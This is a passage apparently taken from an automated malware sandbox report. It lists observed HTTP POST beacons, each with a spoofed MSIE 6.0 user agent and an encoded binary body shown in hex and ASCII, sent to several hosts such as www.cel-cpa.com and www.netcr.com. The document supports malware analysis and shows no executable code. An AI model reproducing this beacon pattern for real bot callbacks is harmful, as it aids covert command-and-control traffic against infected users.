4d 71 33 72 49 50 61 32 54 6b 57 49 6b 37 75 6e 78 31 4b 75 6b 71 71 51 4a 51 2f 42 32 71 6a 4b 2f 62 61 4d 61 73 55 4f 30 41 39 6b 44 5a 6d 69 43 32 39 49 3d Data Ascii: QpBVrxE0gM/v34e0sF5Z8GqmYEDPhkwR1YObFgXbtuqRLuV6A8Zn8Y4gEk2wdSENMBm0OjQNB+GjhBSHg111d+7AjXEwgkK98PlhZu8pAToVjHymD3YBx1P3JFV6Qo8fxliuu+tkOIIPWVjMDBOTUmZ509gO4z6XL5UtrF2gJNfoMdsAJ2NjyMzIM9FBHxHa2rqaqCef6QqaMBvLUP3zkOvI/3gu8BCfDPoZn88VoeJBYYrmAUJ/vLZgXz0jddd3I8rtTGbeoGAqcQJsM500hBEJ4Z/LaAE9AyfeW+HZk3GnE2iDdAetogjWzIWe9/1FU83fCs633fRsz7aDfAUqr1QAWeixX03rypqwsCudXgC34SUYPr7G1TN3JjdvEx8y7kHFNoLRQOt/X514DJ8DHIF7cnhH+BkNu+GHjpIChekBw5hWgvZEnUD7yWmIVWtnJwzSel4Trf7R7uFGh8S6p5AiRprZ+4dJPWYYpKlnfBy+3Xq3i7pVU1Db7PK6wTuRTJ4ZQ1XMq3rIPa2TkWIk7unx1KukqqQJQ/B2qjK/baMasUO0A9kDZmiC29I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 2b 6a 43 4c 6d 6e 54 58 68 38 38 35 69 79 79 41 7a 78 79 42 38 4d 63 57 79 36 5a 73 6a 56 75 6d 36 4b 4d 6f 74 42 75 48 49 6d 2b 61 30 5a 54 4e 76 32 79 41 36 59 6a 6c 52 37 75 30 42 76 47 34 6e 6a 58 38 59 62 6e 72 4d 37 79 36 75 65 7a 74 69 4c 6e 45 55 58 30 55 4f 6e 5a 4a 57 37 58 4d 6b 6a 4e 2b 4b 53 66 48 70 4e 68 2b 4f 59 63 49 31 46 57 30 6c 6c 4d 31 49 35 73 65 5a 72 4e 78 54 45 67 70 31 32 76 43 64 45 55 37 43 31 33 72 6a 55 45 37 56 35 52 65 2b 6d 52 4e 73 79 49 44 65 62 56 4d 6b 67 79 48 78 51 47 2b 64 54 65 5a 76 49 37 56 45 67 51 61 77 68 56 32 50 33 75 49 71 66 54 55 58 54 47 6a 4f 4d 4c 71 68 43 71 39 35 35 6d 51 58 6f 71 37 65 42 49 73 47 50 48 69 74 73 59 34 73 73 41 7a 4d 77 65 63 72 64 41 37 78 68 47 7a 66 34 77 37 47 54 52 6c 36 62 6e 5a 4c 75 73 72 34 62 50 51 56 59 32 51 34 32 6b 4e 4d 61 5a 31 2b 66 64 66 54 58 71 50 41 2b 37 43 75 52 47 4a 67 36 6c 6e 51 52 64 30 73 62 73 6f 64 64 70 44 65 36 69 63 7a 5a 39 4d 5a 4f 56 78 6b 41 38 58 4e 2f 70 43 44 7a 4a 69 44 33 62 77 4b 43 52 47 2f 52 57 45 51 66 54 52 79 43 6e 67 77 64 45 4a 73 38 2b 71 6b 2b 32 52 77 72 38 6e 54 34 31 2f 73 74 38 49 38 41 61 76 7a 7a 32 63 37 6d 68 4f 55 44 38 4d 33 52 5a 6d 2b 74 51 35 2b 39 69 68 64 35 61 61 72 75 65 62 76 41 47 75 64 30 37 51 38 31 6c 6f 36 58 4c 59 63 77 59 50 37 39 70 67 52 6b 31 7a 62 48 79 6f 57 58 31 77 4e 72 70 6a 64 58 76 74 34 58 79 69 62 66 56 64 74 64 65 44 41 66 55 61 64 52 42 42 64 51 30 61 73 34 38 5a 75 78 4e 38 78 6a 36 6a 69 65 6c 2b 68 48 61 78 38 76 77 31 4f 45 31 75 46 69 4c 77 4d 56 32 62 47 6a 35 47 59 50 75 79 43 66 72 65 6d 76 67 3d Data Ascii: +jCLmnTXh885iyyAzxyB8McWy6ZsjVum6KMotBuHIm+a0ZTNv2yA6YjlR7u0BvG4njX8YbnrM7y6ueztiLnEUX0UOnZJW7XMkjN+KSfHpNh+OYcI1FW0llM1I5seZrNxTEgp12vCdEU7C13rjUE7V5Re+mRNsyIDebVMkgyHxQG+dTeZvI7VEgQawhV2P3uIqfTUXTGjOMLqhCq955mQXoq7eBIsGPHitsY4ssAzMwecrdA7xhGzf4w7GTRl6bnZLusr4bPQVY2Q42kNMaZ1+fdfTXqPA+7CuRGJg6lnQRd0sbsoddpDe6iczZ9MZOVxkA8XN/pCDzJiD3bwKCRG/RWEQfTRyCngwdEJs8+qk+2Rwr8nT41/st8I8Aavzz2c7mhOUD8M3RZm+tQ5+9ihd5aaruebvAGud07Q81lo6XLYcwYP79pgRk1zbHyoWX1wNrpjdXvt4XyibfVdtdeDAfUadRBBdQ0as48ZuxN8xj6jiel+hHax8vw1OE1uFiLwMV2bGj5GYPuyCfremvg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 66 54 70 59 31 74 6b 59 6b 73 38 56 70 33 4e 35 36 4b 7a 78 61 58 4b 4f 4b 4c 34 33 6a 36 37 44 48 5a 47 32 63 4b 6a 58 59 45 2f 53 6c 69 72 38 49 4a 49 56 53 47 76 79 68 6e 6d 6c 67 2f 71 67 51 43 51 69 5a 6f 4f 46 42 4c 42 54 4f 78 46 68 31 67 34 76 51 2b 55 41 4c 6b 6e 2f 78 6d 5a 68 6e 6a 7a 2b 6a 42 4b 68 43 6a 44 78 30 6c 39 76 52 79 4c 44 4f 49 65 4e 33 54 77 48 58 32 51 54 70 6e 72 50 47 5a 63 68 54 58 47 30 4c 53 59 75 2f 4a 38 42 45 77 7a 4e 4f 41 4c 65 6c 47 4c 32 6e 79 43 47 47 56 4b 78 74 47 48 6d 47 69 39 72 32 61 37 57 4d 56 32 35 49 75 52 63 54 46 61 38 32 44 6c 77 64 4b 71 43 36 32 62 71 4e 54 34 73 31 58 66 4d 68 41 73 64 65 4b 32 63 6c 6b 48 36 6d 54 4f 4a 49 43 67 6f 2b 47 2b 4a 68 74 74 79 45 36 4e 6f 36 42 38 4a 74 79 62 52 4f 68 56 59 71 2b 67 42 31 57 76 4c 6a 54 75 4f 35 64 44 30 42 50 32 56 70 64 7a 6a 7a 68 78 4f 4e 79 55 75 49 73 37 4c 52 35 48 73 71 67 56 38 30 6d 4f 5a 44 69 30 77 62 43 6d 54 61 73 32 69 31 67 42 2f 6b 61 6b 47 74 5a 47 65 4d 30 46 6e 66 71 66 5a 7a 68 4f 6a 59 6e 69 63 66 4b 36 33 59 47 6a 33 77 53 68 66 4f 71 75 39 2f 62 4d 6c 42 72 4e 64 37 48 6f 42 38 59 67 66 74 6b 53 75 6e 63 66 4b 6d 61 43 6f 6f 78 5a 58 53 70 67 54 35 6a 42 6b 35 58 52 49 58 4e 79 30 42 51 33 55 48 47 54 67 6e 48 52 79 6a 54 49 4c 41 5a 51 63 70 4b 56 57 64 34 33 50 41 59 45 6c 78 61 6c 70 37 35 49 77 6b 63 39 30 72 74 66 38 5a 34 50 49 4d 32 71 61 77 42 57 46 66 56 69 7a 4e 64 32 56 68 36 37 75 79 74 79 64 35 37 30 30 50 5a 4c 4d 4f 33 62 73 70 32 5a 6a 43 68 6d 31 52 65 49 6c 72 67 73 36 36 50 66 48 7a 57 56 58 39 55 2b 5a 30 59 57 2b 77 31 73 46 74 67 55 77 6d 47 37 78 61 41 73 6d 61 67 50 32 79 6d 48 4a 4e 77 3d 3d Data Ascii: fTpY1tkYks8Vp3N56KzxaXKOKL43j67DHZG2cKjXYE/Slir8IJIVSGvyhnmlg/qgQCQiZoOFBLBTOxFh1g4vQ+UALkn/xmZhnjz+jBKhCjDx0l9vRyLDOIeN3TwHX2QTpnrPGZchTXG0LSYu/J8BEwzNOALelGL2nyCGGVKxtGHmGi9r2a7WMV25IuRcTFa82DlwdKqC62bqNT4s1XfMhAsdeK2clkH6mTOJICgo+G+JhttyE6No6B8JtybROhVYq+gB1WvLjTuO5dD0BP2VpdzjzhxONyUuIs7LR5HsqgV80mOZDi0wbCmTas2i1gB/kakGtZGeM0FnfqfZzhOjYnicfK63YGj3wShfOqu9/bMlBrNd7HoB8YgftkSuncfKmaCooxZXSpgT5jBk5XRIXNy0BQ3UHGTgnHRyjTILAZQcpKVWd43PAYElxalp75Iwkc90rtf8Z4PIM2qawBWFfVizNd2Vh67uytyd5700PZLMO3bsp2ZjChm1ReIlrgs66PfHzWVX9U+Z0YW+w1sFtgUwmG7xaAsmagP2ymHJNw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 58 32 36 46 6c 67 61 32 68 38 2b 2f 76 32 72 45 49 5a 56 76 6e 79 6c 35 6f 57 68 6d 54 4a 7a 71 6d 6e 4c 73 36 6a 5a 6a 43 51 46 57 30 39 55 36 2f 5a 76 65 65 31 2b 45 6e 61 69 61 49 49 63 63 42 31 42 59 64 39 59 74 69 62 46 55 75 63 2f 32 6c 43 6e 79 73 2f 4f 45 37 50 51 46 78 6f 77 35 7a 66 36 4e 58 47 50 66 75 52 4e 32 5a 4f 34 43 5a 75 55 4c 66 42 4d 65 4b 50 42 59 62 64 61 41 31 6f 34 57 2f 30 38 39 32 52 6c 74 4f 6c 61 77 4f 63 47 33 49 4c 57 70 75 46 78 74 64 37 6a 68 2f 66 6e 45 79 43 79 71 63 45 48 45 66 39 44 72 30 6c 70 51 46 6d 58 4f 53 78 45 41 58 72 59 77 58 7a 5a 46 38 69 51 4f 78 64 6b 45 52 74 4d 78 2b 70 6c 36 6a 5a 38 5a 37 2f 54 34 41 6f 4d 66 77 53 57 45 34 73 36 41 33 32 44 6f 61 59 2b 52 35 70 62 79 6c 34 43 66 74 33 72 65 53 71 6c 36 2f 36 79 39 66 5a 6f 70 71 56 54 35 39 48 48 62 48 70 45 6a 7a 30 4f 75 57 57 48 6e 75 6d 4c 35 73 4a 33 43 71 6e 41 57 4f 4f 73 36 35 6f 74 2f 53 32 6f 30 55 79 34 4e 45 78 65 4e 36 4b 6b 73 63 67 61 30 44 72 74 31 4c 33 4e 6b 66 53 7a 34 31 32 75 51 6c 45 37 6a 4b 75 48 4b 4f 70 55 53 58 49 70 2b 53 31 41 66 5a 72 4d 6c 56 77 4b 30 65 4b 6e 48 34 33 47 48 37 78 48 71 32 2b 42 4d 7a 5a 53 66 75 61 4a 79 4a 76 2b 39 67 67 55 68 6b 34 34 58 39 53 51 47 74 31 59 76 55 5a 4d 54 51 51 58 31 62 72 30 41 42 6e 69 50 39 64 72 6f 53 34 41 44 6c 2f 61 48 4e 6f 6d 72 69 78 5a 50 4f 64 4d 70 79 4d 4d 66 33 4a 72 52 50 45 4f 74 4d 38 47 54 41 35 33 6a 6a 2f 35 7a 77 35 66 59 6b 45 35 72 35 42 46 37 47 48 33 5a 4d 44 38 51 47 42 46 34 32 37 75 78 33 55 48 7a 63 59 73 66 47 44 59 2b 69 46 35 64 41 66 51 64 2b 48 69 79 50 35 49 61 32 2b 36 7a 78 70 70 7a 5a 48 31 69 42 6b 64 47 37 2f 59 79 78 38 75 6c 30 36 79 6d 6e 67 49 58 48 63 68 36 47 50 65 42 34 58 4a 4a Data Ascii: X26Flga2h8+/v2rEIZVvnyl5oWhmTJzqmnLs6jZjCQFW09U6/Zvee1+EnaiaIIccB1BYd9YtibFUuc/2lCnys/OE7PQFxow5zf6NXGPfuRN2ZO4CZuULfBMeKPBYbdaA1o4W/0892RltOlawOcG3ILWpuFxtd7jh/fnEyCyqcEHEf9Dr0lpQFmXOSxEAXrYwXzZF8iQOxdkERtMx+pl6jZ8Z7/T4AoMfwSWE4s6A32DoaY+R5pbyl4Cft3reSql6/6y9fZopqVT59HHbHpEjz0OuWWHnumL5sJ3CqnAWOOs65ot/S2o0Uy4NExeN6Kkscga0Drt1L3NkfSz412uQlE7jKuHKOpUSXIp+S1AfZrMlVwK0eKnH43GH7xHq2+BMzZSfuaJyJv+9ggUhk44X9SQGt1YvUZMTQQX1br0ABniP9droS4ADl/aHNomrixZPOdMpyMMf3JrRPEOtM8GTA53jj/5zw5fYkE5r5BF7GH3ZMD8QGBF427ux3UHzcYsfGDY+iF5dAfQd+HiyP5Ia2+6zxppzZH1iBkdG7/Yyx8ul06ymngIXHch6GPeB4XJJ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 6d 31 36 4c 32 5a 64 77 4c 73 38 63 2b 49 49 79 68 74 56 6c 51 65 44 43 64 75 2f 4e 44 45 6d 4d 75 2f 30 2b 63 6b 4d 68 37 73 37 4b 75 54 70 41 55 48 70 43 52 45 53 48 4f 79 70 6d 67 5a 35 4c 4c 62 31 69 30 38 68 63 55 33 77 32 68 33 6d 47 32 47 57 66 68 4b 77 4d 45 4c 44 46 45 6d 38 66 39 4d 57 6c 54 48 32 33 4b 56 4d 78 4d 4c 2f 34 4c 6a 6a 66 4b 73 39 41 31 2f 2b 2f 41 42 68 54 6c 74 79 75 78 6b 66 57 52 4a 57 35 50 78 55 51 38 58 6d 4d 6c 43 58 4e 2f 47 31 2f 78 79 38 49 39 69 34 6e 61 6c 2b 4f 79 6c 74 69 65 79 6d 64 75 78 49 55 67 4a 42 56 71 53 4c 62 2f 6b 4f 79 74 57 55 59 71 6a 6f 78 56 2b 77 41 52 36 32 55 4e 36 62 48 6b 34 63 64 45 58 67 55 33 78 47 76 53 6c 50 48 53 65 4d 51 75 65 37 44 42 47 65 6c 69 67 38 2f 7a 49 39 58 75 41 49 68 4c 77 44 63 71 4e 2f 64 73 36 56 71 71 65 53 61 4c 34 78 4a 4f 2b 5a 34 47 4d 57 30 78 38 38 5a 51 48 6f 5a 6d 4e 66 66 7a 6b 34 35 46 2f 6f 47 41 52 56 78 4a 67 6e 72 52 52 39 67 69 43 6b 5a 36 6a 2b 4f 62 4a 2f 69 70 73 4a 65 47 4e 44 48 6f 65 66 43 70 30 75 47 37 39 41 71 79 37 78 71 30 34 2f 61 37 7a 4e 49 6f 66 68 36 5a 35 79 4b 38 34 43 56 6e 6d 79 35 42 4c 50 42 7a 6a 31 38 51 68 73 4f 49 4f 4b 34 35 56 66 71 66 61 62 42 52 6b 32 4f 71 78 4a 31 32 47 66 4c 32 51 4d 6c 6f 58 49 70 61 54 7a 71 69 4c 45 48 67 45 50 6c 58 49 74 6e 4b 6e 53 4e 44 69 45 6c 6b 55 56 51 6b 62 6c 63 4a 37 38 47 49 55 79 31 56 57 73 35 57 62 4a 36 58 59 7a 78 44 4a 41 53 47 4c 70 33 33 64 46 59 69 6e 37 32 76 43 56 39 4f 6e 43 69 51 46 38 4e 71 6c 58 48 53 4c 34 6a 43 4e 5a 46 36 42 71 53 36 47 57 6e 75 62 38 35 33 49 6d 72 43 63 32 67 46 52 75 5a 32 6c 58 53 61 64 2b 31 31 64 72 4e 46 41 72 39 48 42 34 6d 65 6e 37 70 7a 4e 41 37 50 50 4b 6d 7a 74 69 51 66 46 2f 4c 58 67 2f 73 36 64 67 43 6e 46 73 3d Data Ascii: m16L2ZdwLs8c+IIyhtVlQeDCdu/NDEmMu/0+ckMh7s7KuTpAUHpCRESHOypmgZ5LLb1i08hcU3w2h3mG2GWfhKwMELDFEm8f9MWlTH23KVMxML/4LjjfKs9A1/+/ABhTltyuxkfWRJW5PxUQ8XmMlCXN/G1/xy8I9i4nal+OyltieymduxIUgJBVqSLb/kOytWUYqjoxV+wAR62UN6bHk4cdEXgU3xGvSlPHSeMQue7DBGelig8/zI9XuAIhLwDcqN/ds6VqqeSaL4xJO+Z4GMW0x88ZQHoZmNffzk45F/oGARVxJgnrRR9giCkZ6j+ObJ/ipsJeGNDHoefCp0uG79Aqy7xq04/a7zNIofh6Z5yK84CVnmy5BLPBzj18QhsOIOK45VfqfabBRk2OqxJ12GfL2QMloXIpaTzqiLEHgEPlXItnKnSNDiElkUVQkblcJ78GIUy1VWs5WbJ6XYzxDJASGLp33dFYin72vCV9OnCiQF8NqlXHSL4jCNZF6BqS6GWnub853ImrCc2gFRuZ2lXSad+11drNFAr9HB4men7pzNA7PPKmztiQfF/LXg/s6dgCnFs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 2b 6a 43 4c 6d 6e 54 58 68 38 38 35 69 79 79 41 7a 78 79 42 38 4d 63 57 79 36 5a 73 6a 56 75 6d 36 4b 4d 6f 74 42 75 48 49 6d 2b 61 30 5a 54 4e 76 32 79 41 36 59 6a 6c 52 37 75 30 42 76 47 34 6e 6a 58 38 59 62 6e 72 4d 37 79 36 75 65 7a 74 69 4c 6e 45 55 58 30 55 4f 6e 5a 4a 57 37 58 4d 6b 6a 4e 2b 4b 53 66 48 70 4e 68 2b 4f 59 63 49 31 46 57 30 6c 6c 4d 31 49 35 73 65 5a 72 4e 78 54 45 67 70 31 32 76 43 64 45 55 37 43 31 33 72 6a 55 45 37 56 35 52 65 2b 6d 52 4e 73 79 49 44 65 62 56 4d 6b 67 79 48 78 51 47 2b 64 54 65 5a 76 49 37 56 45 67 51 61 77 68 56 32 50 33 75 49 71 66 54 55 58 54 47 6a 4f 4d 4c 71 68 43 71 39 35 35 6d 51 58 6f 71 37 65 42 49 73 47 50 48 69 74 73 59 34 73 73 41 7a 4d 77 65 63 72 64 41 37 78 68 47 7a 66 34 77 37 47 54 52 6c 36 62 6e 5a 4c 75 73 72 34 62 50 51 56 59 32 51 34 32 6b 4e 4d 61 5a 31 2b 66 64 66 54 58 71 50 41 2b 37 43 75 52 47 4a 67 36 6c 6e 51 52 64 30 73 62 73 6f 64 64 70 44 65 36 69 63 7a 5a 39 4d 5a 4f 56 78 6b 41 38 58 4e 2f 70 43 44 7a 4a 69 44 33 62 77 4b 43 52 47 2f 52 57 45 51 66 54 52 79 43 6e 67 77 64 45 4a 73 38 2b 71 6b 2b 32 52 77 72 38 6e 54 34 31 2f 73 74 38 49 38 41 61 76 7a 7a 32 63 37 6d 68 4f 55 44 38 4d 33 52 5a 6d 2b 74 51 35 2b 39 69 68 64 35 61 61 72 75 65 62 76 41 47 75 64 30 37 51 38 31 6c 6f 36 58 4c 59 63 77 59 50 37 39 70 67 52 6b 31 7a 62 48 79 6f 57 58 31 77 4e 72 70 6a 64 58 76 74 34 58 79 69 62 66 56 64 74 64 65 44 41 66 55 61 64 52 42 42 64 51 30 61 73 34 38 5a 75 78 4e 38 78 6a 36 6a 69 65 6c 2b 68 48 61 78 38 76 77 31 4f 45 31 75 46 69 4c 77 4d 56 32 62 47 6a 35 47 59 50 75 79 43 66 72 65 6d 76 67 3d Data Ascii: +jCLmnTXh885iyyAzxyB8McWy6ZsjVum6KMotBuHIm+a0ZTNv2yA6YjlR7u0BvG4njX8YbnrM7y6ueztiLnEUX0UOnZJW7XMkjN+KSfHpNh+OYcI1FW0llM1I5seZrNxTEgp12vCdEU7C13rjUE7V5Re+mRNsyIDebVMkgyHxQG+dTeZvI7VEgQawhV2P3uIqfTUXTGjOMLqhCq955mQXoq7eBIsGPHitsY4ssAzMwecrdA7xhGzf4w7GTRl6bnZLusr4bPQVY2Q42kNMaZ1+fdfTXqPA+7CuRGJg6lnQRd0sbsoddpDe6iczZ9MZOVxkA8XN/pCDzJiD3bwKCRG/RWEQfTRyCngwdEJs8+qk+2Rwr8nT41/st8I8Aavzz2c7mhOUD8M3RZm+tQ5+9ihd5aaruebvAGud07Q81lo6XLYcwYP79pgRk1zbHyoWX1wNrpjdXvt4XyibfVdtdeDAfUadRBBdQ0as48ZuxN8xj6jiel+hHax8vw1OE1uFiLwMV2bGj5GYPuyCfremvg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 51 70 42 56 72 78 45 30 67 4d 2f 76 33 34 65 30 73 46 35 5a 38 47 71 6d 59 45 44 50 68 6b 77 52 31 59 4f 62 46 67 58 62 74 75 71 52 4c 75 56 36 41 38 5a 6e 38 59 34 67 45 6b 32 77 64 53 45 4e 4d 42 6d 30 4f 6a 51 4e 42 2b 47 6a 68 42 53 48 67 31 31 31 64 2b 37 41 6a 58 45 77 67 6b 4b 39 38 50 6c 68 5a 75 38 70 41 54 6f 56 6a 48 79 6d 44 33 59 42 78 31 50 33 4a 46 56 36 51 6f 38 66 78 6c 69 75 75 2b 74 6b 4f 49 49 50 57 56 6a 4d 44 42 4f 54 55 6d 5a 35 30 39 67 4f 34 7a 36 58 4c 35 55 74 72 46 32 67 4a 4e 66 6f 4d 64 73 41 4a 32 4e 6a 79 4d 7a 49 4d 39 46 42 48 78 48 61 32 72 71 61 71 43 65 66 36 51 71 61 4d 42 76 4c 55 50 33 7a 6b 4f 76 49 2f 33 67 75 38 42 43 66 44 50 6f 5a 6e 38 38 56 6f 65 4a 42 59 59 72 6d 41 55 4a 2f 76 4c 5a 67 58 7a 30 6a 64 64 64 33 49 38 72 74 54 47 62 65 6f 47 41 71 63 51 4a 73 4d 35 30 30 68 42 45 4a 34 5a 2f 4c 61 41 45 39 41 79 66 65 57 2b 48 5a 6b 33 47 6e 45 32 69 44 64 41 65 74 6f 67 6a 57 7a 49 57 65 39 2f 31 46 55 38 33 66 43 73 36 33 33 66 52 73 7a 37 61 44 66 41 55 71 72 31 51 41 57 65 69 78 58 30 33 72 79 70 71 77 73 43 75 64 58 67 43 33 34 53 55 59 50 72 37 47 31 54 4e 33 4a 6a 64 76 45 78 38 79 37 6b 48 46 4e 6f 4c 52 51 4f 74 2f 58 35 31 34 44 4a 38 44 48 49 46 37 63 6e 68 48 2b 42 6b 4e 75 2b 47 48 6a 70 49 43 68 65 6b 42 77 35 68 57 67 76 5a 45 6e 55 44 37 79 57 6d 49 56 57 74 6e 4a 77 7a 53 65 6c 34 54 72 66 37 52 37 75 46 47 68 38 53 36 70 35 41 69 52 70 72 5a 2b 34 64 4a 50 57 59 59 70 4b 6c 6e 66 42 79 2b 33 58 71 33 69 37 70 56 55 31 44 62 37 50 4b 36 77 54 75 52 54 4a 34 5a 51 31 58 4d 71 33 72 49 50 61 32 54 6b 57 49 6b 37 75 6e 78 31 4b 75 6b 71 71 51 4a 51 2f 42 32 71 6a 4b 2f 62 61 4d 61 73 55 4f 30 41 39 6b 44 5a 6d 69 43 32 39 49 3d Data Ascii: QpBVrxE0gM/v34e0sF5Z8GqmYEDPhkwR1YObFgXbtuqRLuV6A8Zn8Y4gEk2wdSENMBm0OjQNB+GjhBSHg111d+7AjXEwgkK98PlhZu8pAToVjHymD3YBx1P3JFV6Qo8fxliuu+tkOIIPWVjMDBOTUmZ509gO4z6XL5UtrF2gJNfoMdsAJ2NjyMzIM9FBHxHa2rqaqCef6QqaMBvLUP3zkOvI/3gu8BCfDPoZn88VoeJBYYrmAUJ/vLZgXz0jddd3I8rtTGbeoGAqcQJsM500hBEJ4Z/LaAE9AyfeW+HZk3GnE2iDdAetogjWzIWe9/1FU83fCs633fRsz7aDfAUqr1QAWeixX03rypqwsCudXgC34SUYPr7G1TN3JjdvEx8y7kHFNoLRQOt/X514DJ8DHIF7cnhH+BkNu+GHjpIChekBw5hWgvZEnUD7yWmIVWtnJwzSel4Trf7R7uFGh8S6p5AiRprZ+4dJPWYYpKlnfBy+3Xq3i7pVU1Db7PK6wTuRTJ4ZQ1XMq3rIPa2TkWIk7unx1KukqqQJQ/B2qjK/baMasUO0A9kDZmiC29I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 6f 32 6e 39 35 38 66 37 6d 73 38 51 49 71 56 65 39 67 59 4f 48 70 44 68 6f 2f 75 39 4c 35 61 4a 36 39 73 42 47 38 42 71 74 50 59 58 48 39 6e 6c 46 46 6e 32 30 44 48 31 72 64 53 42 30 32 32 53 6d 75 41 4c 30 45 4a 50 4f 30 4c 47 76 4f 63 2f 69 46 31 6a 44 61 30 72 56 59 77 7a 6e 6d 58 72 33 30 74 49 2f 43 6e 62 6e 74 74 7a 56 71 38 54 52 33 67 37 41 30 42 45 72 36 68 67 52 4f 67 6a 79 55 68 6a 63 49 46 71 77 37 6b 76 30 7a 42 45 42 61 49 51 53 35 45 4d 58 75 54 2b 68 67 62 68 55 38 48 33 4c 33 64 7a 75 39 4b 66 6e 57 31 6e 32 6c 62 33 49 6c 67 59 73 47 4f 31 56 6b 71 65 43 62 31 71 78 65 52 34 6c 75 43 72 46 76 63 4f 49 59 50 35 48 59 57 5a 74 53 47 52 31 33 67 49 79 6b 78 42 56 51 53 75 6c 30 41 34 6b 32 6f 5a 4e 71 32 31 43 74 59 72 30 67 4f 6e 4d 6c 63 50 6e 67 37 46 6a 74 58 76 4b 31 45 41 6d 6b 6a 6b 2b 4d 43 64 41 6a 7a 34 30 4e 75 35 2f 2b 6f 46 53 4d 30 4e 4f 76 53 73 44 35 49 74 39 30 78 34 6f 41 37 46 6f 6e 62 42 33 39 32 54 58 77 6b 2b 30 59 61 62 31 67 2f 46 2b 73 59 66 32 45 36 74 69 36 77 68 6a 6e 64 67 41 65 38 43 4c 43 44 42 71 55 34 6f 61 49 71 52 46 5a 72 35 32 69 37 4a 2b 6e 43 4d 70 2b 2b 32 57 6a 31 4d 4d 6b 39 56 69 45 54 67 76 35 37 67 78 63 77 51 54 6b 50 78 67 76 39 67 42 45 32 51 37 31 76 69 42 59 32 55 50 35 6f 4c 44 6c 61 67 38 5a 47 30 6b 37 77 5a 6f 43 47 48 78 66 38 58 4f 57 73 42 68 30 6e 6a 50 2f 4c 67 6a 4d 38 67 44 52 70 72 79 6f 54 61 7a 64 53 56 4a 2b 74 59 55 51 4c 7a 74 57 52 55 42 56 4d 44 67 67 49 43 59 52 6f 79 74 52 2b 44 69 51 37 61 46 63 43 67 76 45 66 58 76 66 4e 55 69 6a 69 47 45 45 34 53 4f 62 75 65 33 54 35 53 38 33 32 51 65 2f 61 45 69 4c 32 64 77 38 62 4e 39 52 4d 3d Data Ascii: o2n958f7ms8QIqVe9gYOHpDho/u9L5aJ69sBG8BqtPYXH9nlFFn20DH1rdSB022SmuAL0EJPO0LGvOc/iF1jDa0rVYwznmXr30tI/CnbnttzVq8TR3g7A0BEr6hgROgjyUhjcIFqw7kv0zBEBaIQS5EMXuT+hgbhU8H3L3dzu9KfnW1n2lb3IlgYsGO1VkqeCb1qxeR4luCrFvcOIYP5HYWZtSGR13gIykxBVQSul0A4k2oZNq21CtYr0gOnMlcPng7FjtXvK1EAmkjk+MCdAjz40Nu5/+oFSM0NOvSsD5It90x4oA7FonbB392TXwk+0Yab1g/F+sYf2E6ti6whjndgAe8CLCDBqU4oaIqRFZr52i7J+nCMp++2Wj1MMk9ViETgv57gxcwQTkPxgv9gBE2Q71viBY2UP5oLDlag8ZG0k7wZoCGHxf8XOWsBh0njP/LgjM8gDRpryoTazdSVJ+tYUQLztWRUBVMDggICYRoytR+DiQ7aFcCgvEfXvfNUijiGEE4SObue3T5S832Qe/aEiL2dw8bN9RM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 36 4c 51 31 31 76 64 6e 6d 73 38 35 43 42 72 67 5a 71 54 52 63 30 43 4e 6f 38 43 74 64 79 6f 74 47 37 50 39 5a 79 45 44 6f 4b 68 4d 37 46 75 32 49 54 34 61 31 71 42 32 73 72 53 69 71 36 66 42 55 52 73 5a 69 35 58 56 35 53 65 62 77 69 6a 51 35 6b 35 72 4b 64 48 6d 44 73 37 50 74 4c 46 67 6a 67 4b 49 4c 50 70 68 30 62 76 6d 4a 56 65 7a 34 66 7a 50 79 46 64 48 4c 76 4e 69 57 52 64 4e 54 32 58 33 78 4c 35 66 48 4a 36 46 4c 54 53 41 4b 69 56 4c 49 52 59 65 75 79 50 78 67 4c 49 7a 4e 75 45 71 71 32 36 45 49 79 69 31 72 55 59 4b 2f 4c 57 5a 42 34 63 49 71 56 45 52 4d 7a 2f 42 48 51 63 52 71 6e 57 36 73 62 6f 34 6f 5a 6e 57 42 68 54 5a 49 31 56 64 6e 76 39 35 6c 73 44 57 4a 6d 6f 2b 74 44 2f 4b 66 52 49 56 5a 49 2b 6b 56 43 67 52 46 74 5a 72 4d 39 4f 4b 4c 68 34 6f 44 63 45 61 74 4d 76 6d 39 77 61 62 48 54 4f 6a 61 76 52 7a 70 50 77 45 61 73 30 2f 72 53 33 65 79 35 7a 46 33 74 58 65 41 50 4d 65 35 6f 64 79 75 36 4a 62 74 37 